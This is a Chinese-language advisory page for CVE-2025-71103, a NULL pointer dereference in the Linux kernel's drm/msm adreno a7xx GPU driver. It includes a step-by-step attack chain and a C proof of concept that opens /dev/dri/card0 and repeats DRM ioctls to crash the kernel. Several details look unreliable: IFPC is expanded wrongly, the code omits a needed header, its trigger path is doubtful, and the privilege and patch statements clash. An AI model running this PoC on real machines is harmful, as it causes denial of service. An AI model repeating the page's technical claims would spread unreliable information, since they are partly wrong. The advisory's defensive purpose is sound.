CVE-2025-71103 CVSS 5.5 中危

CVE-2025-71103: Linux内核drm/msm adreno驱动NULL指针解引用漏洞

披露日期: 2026-01-14

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2025-71103

漏洞类型

NULL指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 drm/msm adreno GPU驱动

漏洞概述

CVE-2025-71103是Linux内核中的一个中等严重性安全漏洞，位于Direct Rendering Manager (DRM)的msm驱动中，具体影响adreno GPU系列。该漏洞发生在a7xx GPU初始化过程中，当GPU不支持IFPC（Instruction Fetch Program Counter）功能时，系统仍然尝试访问ifpc_reglist指针，导致NULL指针解引用错误，最终引发内核崩溃。攻击者可通过本地低权限账户触发此漏洞，造成系统可用性中断。此漏洞的CVSS评分为5.5，属于中危级别，主要影响系统的可用性，对机密性和完整性无影响。

技术细节

该漏洞位于Linux内核的drivers/gpu/drm/msm/adreno/a6xx_gpu.c文件中。在a7xx_patch_pwrup_reglist()函数中，代码假设ifpc_reglist始终有效，但在某些a7xx GPU配置中，IFPC功能可能未启用，导致ifpc_reglist指针为NULL。当函数尝试解引用该NULL指针时（如访问ifpc_reglist->xxx），内核会触发NULL指针解引用异常，崩溃信息显示错误地址为0x0000000000000008，表明正在访问NULL结构体的成员字段。攻击者可通过打开DRM设备文件（/dev/dri/cardX）并触发GPU初始化来利用此漏洞，无需特殊权限即可导致系统崩溃。修复方案是在解引用前检查ifpc_reglist是否为NULL，或在ifpc_reglist声明时进行条件编译。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地低权限访问权限

STEP 2

步骤2

攻击者识别系统使用带有a7xx GPU的设备，并确认Linux内核版本存在漏洞

STEP 3

步骤3

攻击者打开DRM设备文件(/dev/dri/cardX)，触发GPU驱动初始化

STEP 4

步骤4

系统调用adreno_load_gpu()和a6xx_hw_init()函数

STEP 5

步骤5

在a7xx_patch_pwrup_reglist()函数中，代码尝试解引用NULL的ifpc_reglist指针

STEP 6

步骤6

内核触发NULL指针解引用异常，导致系统崩溃并可能重启

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2025-71103: NULL pointer dereference in a7xx GPU init
// This PoC triggers the kernel NULL pointer dereference by initializing
// the DRM driver on an a7xx GPU without IFPC support

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <drm/drm.h>
#include <sys/ioctl.h>

int main() {
    int fd;
    
    // Open DRM device (typically /dev/dri/card0 for primary GPU)
    fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open DRM device");
        return 1;
    }
    
    printf("CVE-2025-71103 PoC: Triggering a7xx GPU initialization...\n");
    
    // Trigger GPU initialization by requesting driver info
    // This will call msm_gpu_hw_init -> adreno_load_gpu -> a6xx_hw_init
    struct drm_version version;
    memset(&version, 0, sizeof(version));
    
    // Multiple ioctl calls may be needed to fully initialize the GPU
    for (int i = 0; i < 10; i++) {
        if (ioctl(fd, DRM_IOCTL_VERSION, &version) < 0) {
            perror("DRM_VERSION ioctl failed");
        }
    }
    
    close(fd);
    printf("PoC execution completed. Check kernel logs for crash.\n");
    return 0;
}

影响范围

Linux内核 < 6.12.x (包含a7xx GPU支持)

drm/msm驱动受影响版本

特定于配置了不支持IFPC的a7xx GPU的系统

防御指南

临时缓解措施

在官方补丁发布之前，可以通过内核命令行参数禁用问题驱动或使用替代GPU配置。对于容器化环境，确保容器无法直接访问DRM设备(/dev/dri/*)。同时监控系统日志中的内核崩溃信息，并准备系统恢复方案。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表